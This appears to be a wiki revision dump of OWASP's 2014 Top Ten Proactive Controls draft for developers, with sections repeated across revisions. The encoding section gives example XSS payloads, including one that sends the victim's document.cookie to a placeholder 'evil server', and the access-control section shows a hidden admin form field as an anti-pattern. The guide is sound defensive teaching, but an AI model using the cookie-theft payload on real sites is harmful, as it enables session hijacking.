For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection TODO JIMBIRD ==<br />
<br />
Application logging should be consistent within the application, consistent across an organization's application portfolio and use industry standards where relevant, so the logged event data can be consumed, correlated, analyzed and managed by a wide variety of systems.<br />
<br />
Application logging should be always be included for security events. Application logs are invaluable data for:<br />
<br />
* Identifying security incidents<br />
* Monitoring policy violations<br />
* Establishing baselines<br />
* Providing information about problems and unusual conditions<br />
* Contributing additional application-specific data for incident investigation which is lacking in other log sources<br />
* Helping defend against vulnerability identification and exploitation through attack detection<br />
<br />
Application logging might also be used to record other types of events too such as:<br />
<br />
* Security events<br />
* Business process monitoring e.g. sales process abandonment, transactions, connections<br />
* Audit trails e.g. data addition, modification and deletion, data exports<br />
* Performance monitoring e.g. data load time, page timeouts<br />
* Compliance monitoring<br />
* Data for subsequent requests for information e.g. data subject access, freedom of information, litigation, police and other regulatory investigations<br />
* Legally sanctioned interception of data e.g application-layer wire-tapping<br />
* Other business-specific requirements<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCIDSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. It is important not to log too much, or too little. Use knowledge of the intended purposes to guide what, when and how much.<br />
<br />
For more information, please see the [[Logging Cheat Sheet]].<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
TODO: Log Injection<br />
<br />
JIM BIRD: Talks about logging of “security events” but doesn’t explain or give examples of what a security event is. Reminder to obey privacy/confidentiality requirements – do not log private/confidential information Maybe should include something brief about protection from log injection (reminder to perform validation/encoding on user input fields that are logged)<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use-cases which include input, behavior and output, and can be tested for functional correctness by Q/A staff. Functional requirements like re-authentication during change password or a forgot password feature can be reviewed and tested by Q/A staff. <br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features are often multi-step multi-branch workflows that are difficult to evaluate thoroughly, for example eCommerce workflows, shipping route choices, or banking transfer validation. The stories or use cases for these requirements should include failure scenarios (what happens if a step fails or times out or if someone accidentally repeats a step?) and requirements derived from "abuse-cases". Abuse cases describe how the application's functions could be subverted by attackers. Thinking about failures and attack scenarios will uncover weaknesses that need to be addressed to improve the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must be aware of what personal and confidential information needs to be protected and tracked. This will drive the need for access control, encryption and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
Security needs to be considered in the architecture and design of the application.<br />
<br />
1) '''Know your Tools''': your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team needs to understand and manage.<br />
<br />
2) '''Understand Trust and Dependencies''': another important part of secure architecture and design is tiering and trust, deciding what is done in the client, the web layer, the business layer, the data layer, and the trust assumptions that developers need to make between different parts of the system. What is inside/outside of a trust zone/boundary, what sources can be trusted, what should not be. This determines where you need to make decisions about authentication, access control, data validation and/or encoding, encryption and logging.<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=169945OWASP Proactive Controls2014-03-11T17:30:28Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection TODO JIMBIRD ==<br />
<br />
Application logging should be consistent within the application, consistent across an organization's application portfolio and use industry standards where relevant, so the logged event data can be consumed, correlated, analyzed and managed by a wide variety of systems.<br />
<br />
Application logging should be always be included for security events. Application logs are invaluable data for:<br />
<br />
* Identifying security incidents<br />
* Monitoring policy violations<br />
* Establishing baselines<br />
* Providing information about problems and unusual conditions<br />
* Contributing additional application-specific data for incident investigation which is lacking in other log sources<br />
* Helping defend against vulnerability identification and exploitation through attack detection<br />
<br />
Application logging might also be used to record other types of events too such as:<br />
<br />
* Security events<br />
* Business process monitoring e.g. sales process abandonment, transactions, connections<br />
* Audit trails e.g. data addition, modification and deletion, data exports<br />
* Performance monitoring e.g. data load time, page timeouts<br />
* Compliance monitoring<br />
* Data for subsequent requests for information e.g. data subject access, freedom of information, litigation, police and other regulatory investigations<br />
* Legally sanctioned interception of data e.g application-layer wire-tapping<br />
* Other business-specific requirements<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCIDSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. It is important not to log too much, or too little. Use knowledge of the intended purposes to guide what, when and how much.<br />
<br />
For more information, please see the [[Logging Cheat Sheet]].<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
TODO: Log Injection<br />
<br />
JIM BIRD: Talks about logging of “security events” but doesn’t explain or give examples of what a security event is. Reminder to obey privacy/confidentiality requirements – do not log private/confidential information Maybe should include something brief about protection from log injection (reminder to perform validation/encoding on user input fields that are logged)<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use-cases which include input, behavior and output, and can be tested for functional correctness by Q/A staff. Functional requirements like re-authentication during change password or a forgot password feature can be reviewed and tested by Q/A staff. <br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features are often multi-step multi-branch workflows that are difficult to evaluate thoroughly, for example eCommerce workflows, shipping route choices, or banking transfer validation. The stories or use cases for these requirements should include failure scenarios (what happens if a step fails or times out or if someone accidentally repeats a step?) and requirements derived from "abuse-cases". Abuse cases describe how the application's functions could be subverted by attackers. Thinking about failures and attack scenarios will uncover weaknesses that need to be addressed to improve the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must be aware of what personal and confidential information needs to be protected and tracked. This will drive the need for access control, encryption and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
Designing secure software is a strategic effort where business, technical and security stakeholders agree on both the functional and non-functional security properties of software well before it is built. This is not an easy endeavor.<br />
<br />
JIM BIRD: Another important part of secure architecture and design is tiering and trust – deciding what is done in the UI, the web layer, the business layer, the data layer, and introducing trust zones/boundaries into this. What is inside/outside of a trust zone/boundary, what sources can be trusted, what cannot be. Attack Surface also comes into architecture/design. Creating an awareness of the system’s Attack Surface, trying to minimize it where possible, understanding when/how you are increasing it and understanding that this increases the risks of attack. For example, anonymous public access to the system, file uploads and interfaces to external systems are all potentially serious sources of security risk. Platform selection: language(s), O/S, web server, database or NOSQL data manager, etc. These architectural choices result in technology-specific security risks and constraints that the team needs to learn about and understand. Know your tools.<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=169944OWASP Proactive Controls2014-03-11T16:59:31Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
